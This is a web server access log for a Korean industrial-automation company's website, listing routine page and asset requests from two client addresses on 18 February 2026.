GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:01 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:39:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:40:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10339] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:43:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10347] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:00:48:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:33 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 205.169.39.217] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" -[18/Feb/2026:01:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 205.169.39.217] [Length 10360] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" -[18/Feb/2026:01:06:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 205.169.39.217] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 205.169.39.217] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:49 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 205.169.39.217] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "-" -[18/Feb/2026:01:06:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 205.169.39.217] [Length 10347] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "-" -[18/Feb/2026:01:06:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 205.169.39.217] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 205.169.39.217] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 205.169.39.217] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 205.169.39.217] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 205.169.39.217] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 205.169.39.217] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 205.169.39.217] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 205.169.39.217] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 205.169.39.217] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 205.169.39.217] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 205.169.39.217] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:06:53 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 205.169.39.217] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10340] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:01:09:32 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" 